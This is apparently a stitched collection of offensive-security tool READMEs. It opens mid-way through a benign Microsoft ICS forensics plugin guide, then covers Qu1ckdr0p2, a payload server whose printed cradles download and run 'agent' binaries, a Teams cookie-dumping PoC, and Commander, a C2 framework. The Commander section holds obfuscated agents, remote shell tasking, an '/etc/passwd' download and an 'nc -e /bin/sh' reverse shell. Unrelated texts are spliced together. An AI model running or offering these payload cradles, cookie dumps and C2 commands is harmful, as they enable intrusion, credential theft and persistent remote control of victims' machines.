    self.description = "General Plugin Description"
    self.port = 123
    self.transport = Transport.TCP

    def flags(self, parser):
    self.base_flags(parser, self.port, self.transport)
    parser.add_argument('--general', help='General additional argument', metavar="")


    class General(PluginInterface):
    def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
    super().__init__(config, output_dir, verbose)

    def connect(self, address):
    self.logger.info(f"{self.config.name} connect")

    def export(self, extracted):
    self.logger.info(f"{self.config.name} export")
    • Make sure to import your new plugin in the __init__.py file under the plugins folder
    • In the PluginInterface inherited class there is 'config' parameters, you can use this to access any data that's available in the PluginConfig object (plugin name, addresses, port, transport, parameters).
      there are 2 mandatory functions (connect, export).
      the connect function receives single ip address and extracts any relevant information from the device and return it.
      the export function receives the information that was extracted from all the devices and there you can export it to file.
    • In the PluginCLI inherited class you need to specify in the init function the default information related to this plugin.
      there is a single mandatory function (flags).
      In which you must call base_flags, and you can add any additional flags that you want to have.

    Adding Analyzers

    • Create new directory under analyzers folder with the plugin name that related to your analyzer.
    • Create new Python file with your analyzer name
    • Use the following template to write your plugin and replace 'General' with your plugin name
    from pathlib import Path
    from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig


    class General(AnalyzerInterface):
    def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
    super().__init__(config, output_dir, verbose)
    self.plugin_name = 'General'
    self.create_output_dir(self.plugin_name)

    def analyze(self):
    pass
    • Make sure to import your new analyzer in the __init__.py file under the analyzers folder

    Resources and Technical data & solution:

    Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.

    Section 52 under MSRC blog
    ICS Lecture given about the tool
    Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube

    Contributing

    This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

    When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

    This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

    Trademarks

    This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.



    Qu1Ckdr0P2 - Quicky Serve Files Over Http Or Https Using Flask

    By: Zion3R


    Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.

    Designed to be used on exams like OSCP / PNPT or CTFs HTB / etc.

    Pull requests and issues welcome. As are any contributions.

    Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default it will generate a self-signed certificate to use when using the --https option, priority is also given to the tun0 interface when the webserver is running, otherwise it will use eth0.

    The common.ini defines the mapped aliases used within the --search and -u options.


    When the webserver is running there are several download cradles printed to the screen to copy and paste.

    pip3 install qu1ckdr0p2

    echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
    source ~/.zshrc

    or

    echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
    source ~/.bashrc

    serv init --update

    $ serv serve -f implant.bin --https 443
    $ serv serve -f file.example --http 8080

    $ serv --help            
    Usage: serv [OPTIONS] COMMAND [ARGS]...

    Welcome to qu1ckdr0p2 entry point.

    Options:
    --debug Enable debug mode.
    --help Show this message and exit.

    Commands:
    init Perform updates.
    serve Serve files.
    dynamic number -f, --file FILE Serve a file --http INTEGER Use HTTP with a custom port --https INTEGER Use HTTPS with a custom port -h, --help Show this message and exit." dir="auto">
    $ serv serve --help
    Usage: serv serve [OPTIONS]

    Serve files.

    Options:
    -l, --list List aliases
    -s, --search TEXT Search query for aliases
    -u, --use INTEGER Use an alias by a dynamic number
    -f, --file FILE Serve a file
    --http INTEGER Use HTTP with a custom port
    --https INTEGER Use HTTPS with a custom port
    -h, --help Show this message and exit.
    $ serv init --help       
    Usage: serv init [OPTIONS]

    Perform updates.

    Options:
    --update Check and download missing tools.
    --update-self Update the tool using pip.
    --update-self-test Used for dev testing, installs unstable build.
    --help Show this message and exit.
    $ serv init --update
    $ serv init --update-self

    The mapped alias numbers for the -u option are dynamic so you don't have to remember specific numbers or ever type out a tool name.

    ligolo [β†’] Path: ~/.qu1ckdr0p2/windows/agent.exe [β†’] Alias: ligolo_agent_win [β†’] Use: 1 [β†’] Path: ~/.qu1ckdr0p2/windows/proxy.exe [β†’] Alias: ligolo_proxy_win [β†’] Use: 2 [β†’] Path: ~/.qu1ckdr0p2/linux/agent [β†’] Alias: ligolo_agent_linux [β†’] Use: 3 [β†’] Path: ~/.qu1ckdr0p2/linux/proxy [β†’] Alias: ligolo_proxy_linux [β†’] Use: 4 (...)" dir="auto">
    $ serv serve --search ligolo               

    [β†’] Path: ~/.qu1ckdr0p2/windows/agent.exe
    [β†’] Alias: ligolo_agent_win
    [β†’] Use: 1

    [β†’] Path: ~/.qu1ckdr0p2/windows/proxy.exe
    [β†’] Alias: ligolo_proxy_win
    [β†’] Use: 2

    [β†’] Path: ~/.qu1ckdr0p2/linux/agent
    [β†’] Alias: ligolo_agent_linux
    [β†’] Use: 3

    [β†’] Path: ~/.qu1ckdr0p2/linux/proxy
    [β†’] Alias: ligolo_proxy_linux
    [β†’] Use: 4
    (...)
    $ serv serve --search ligolo -u 3 --http 80

    [β†’] Serving: ../../.qu1ckdr0p2/linux/agent
    [β†’] Protocol: http
    [β†’] IP address: 192.168.1.5
    [β†’] Port: 80
    [β†’] Interface: eth0
    [β†’] CTRL+C to quit

    [β†’] URL: http://192.168.1.5:80/agent

    [↓] csharp:
    $webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'

    [↓] wget:
    wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

    [↓] curl:
    curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

    [↓] powershell:
    Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent

    β § Web server running

    MIT



    Teams_Dump - PoC For Dumping And Decrypting Cookies In The Latest Version Of Microsoft Teams

    By: Zion3R


    PoC for dumping and decrypting cookies in the latest version of Microsoft Teams


    extract.py just dumps without arguments

    extract.exe is just extract.py packed into an exe

    List values in the database

    python.exe .\teams_dump.py teams --list

    Table: meta
    Columns in meta: key, value
    --------------------------------------------------
    Table: cookies
    Columns in cookies: creation_utc, host_key, top_frame_site_key, name, value, encrypted_value, path, expires_utc, is_secure, is_httponly, last_access_utc, has_expires, is_persistent, priority, samesite, source_scheme, source_port, is_same_party

    Dump the database into a json file

    python.exe .\teams_dump.py teams --get
    [+] Host: teams.microsoft.com
    [+] Cookie Name MUIDB
    [+] Cookie Value: xxxxxxxxxxxxxx
    **************************************************
    [+] Host: teams.microsoft.com
    [+] Cookie Name TSREGIONCOOKIE
    [+] Cookie Value: xxxxxxxxxxxxxx
    **************************************************


    Commander - A Command And Control (C2) Server

    By: Zion3R


    Commander is a command and control framework (C2) written in Python, Flask and SQLite. ItΒ comes with two agents written in Python and C.

    Under Continuous Development

    Not script-kiddie friendly


    Features

    • Fully encrypted communication (TLS)
    • Multiple Agents
    • Obfuscation
    • Interactive Sessions
    • Scalable
    • Base64 data encoding
    • RESTful API

    Agents

    • Python 3
      • The python agent supports:
        • sessions, an interactive shell between the admin and the agent (like ssh)
        • obfuscation
        • Both Windows and Linux systems
        • download/upload files functionality
    • C
      • The C agent supports only the basic functionality for now, the control of tasks for the agents
      • Only for Linux systems

    Requirements

    Python >= 3.6 is required to run and the following dependencies

    Linux for the admin.py and c2_server.py. (Untested for windows)
    apt install libcurl4-openssl-dev libb64-dev
    apt install openssl
    pip3 install -r requirements.txt

    How to Use it

    First create the required certs and keys

    # if you want to secure your key with a passphrase exclude the -nodes
    openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

    Start the admin.py module first in order to create a local sqlite db file

    python3 admin.py

    Continue by running the server

    python3 c2_server.py

    And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.

    # python agent
    python3 agent.py

    # C agent
    gcc agent.c -o agent -lcurl -lb64
    ./agent

    By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.

    As the Operator/Administrator you can use the following commands to control your agents

    Commands:

    task add arg c2-commands
    Add a task to an agent, to a group or on all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
    c2-register: Triggers the agent to register again.
    c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
    cmd: The command to execute.
    c2-sleep: Configure the interval that an agent will check for tasks.
    c2-session port: Instructs the agent to open a shell session with the server to this port.
    port: The port to connect to. If it is not provided it defaults to 5555.
    c2-quit: Forces an agent to quit.

    task delete arg
    Delete a task from an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show agent arg
    Displays inf o for all the availiable agents or for specific agent.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show task arg
    Displays the task of an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show result arg
    Displays the history/result of an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    find active agents
    Drops the database so that the active agents will be registered again.

    exit
    Bye Bye!


    Sessions:

    sessions server arg [port]
    Controls a session handler.
    arg: can have the following values: 'start' , 'stop' 'status'
    port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
    sessions select arg
    Select in which session to attach.
    arg: the index from the 'sessions list' result
    sessions close arg
    Close a session.
    arg: the index from the 'sessions list' result
    sessions list
    Displays the availiable sessions
    local-ls directory
    Lists on your host the files on the selected directory
    download 'file'
    Downloads the 'file' locally on the current directory
    upload 'file'
    Uploads a file in the directory where the agent currently is

    Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P

    The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

    Flows

    Below you can find a normal flow diagram

    Normal Flow

    In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

    More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

    Below is the flow diagram for this case.

    Re-register Flow

    Useful examples

    To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.

    # show all availiable agents
    show agent all

    To instruct all the agents to run the command "id" you can do it like this:

    To check the history/ previous results of executed tasks for a specific agent do it like this:
    # check the results of a specific agent
    show result 85913eb1245d40eb96cf53eaf0b1e241

    You can also change the interval of the agents that checks for tasks to 30 seconds like this:

    # to set it for all agents
    task add all c2-sleep 30

    To open a session with one or more of your agents do the following.

    # find the agent/uuid
    show agent all

    # enable the server to accept connections
    sessions server start 5555

    # add a task for a session to your prefered agent
    task add your_prefered_agent_uuid_here c2-session 5555

    # display a list of available connections
    sessions list

    # select to attach to one of the sessions, lets select 0
    sessions select 0

    # run a command
    id

    # download the passwd file locally
    download /etc/passwd

    # list your files locally to check that passwd was created
    local-ls

    # upload a file (test.txt) in the directory where the agent is
    upload test.txt

    # return to the main cli
    go back

    # check if the server is running
    sessions server status

    # stop the sessions server
    sessions server stop

    If for some reason you want to run another external session like with netcat or metaspolit do the following.

    # show all availiable agents
    show agent all

    # first open a netcat on your machine
    nc -vnlp 4444

    # add a task to open a reverse shell for a specific agent
    task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

    This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.

    Obfuscation

    The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

    Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py

    You can run it like this:

    python3 obfuscator.py

    # and to run the agent, do as usual
    python3 obs_agent.py

    Tips &Tricks

    1. The build-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
    gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key 
    1. Create a binary file for your python agent like this
    pip install pyinstaller
    pyinstaller --onefile agent.py

    The binary can be found under the dist directory.

    In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

    1. Create new certs in each engagement

    2. Backup your c2.db, it is easy... just a file

    Testing

    pytest was used for the testing. You can run the tests like this:

    cd tests/
    py.test

    Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

    To check the code coverage and produce a nice html report you can use this:

    # pip3 install pytest-cov
    python -m pytest --cov=Commander --cov-report html

    Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



    ❌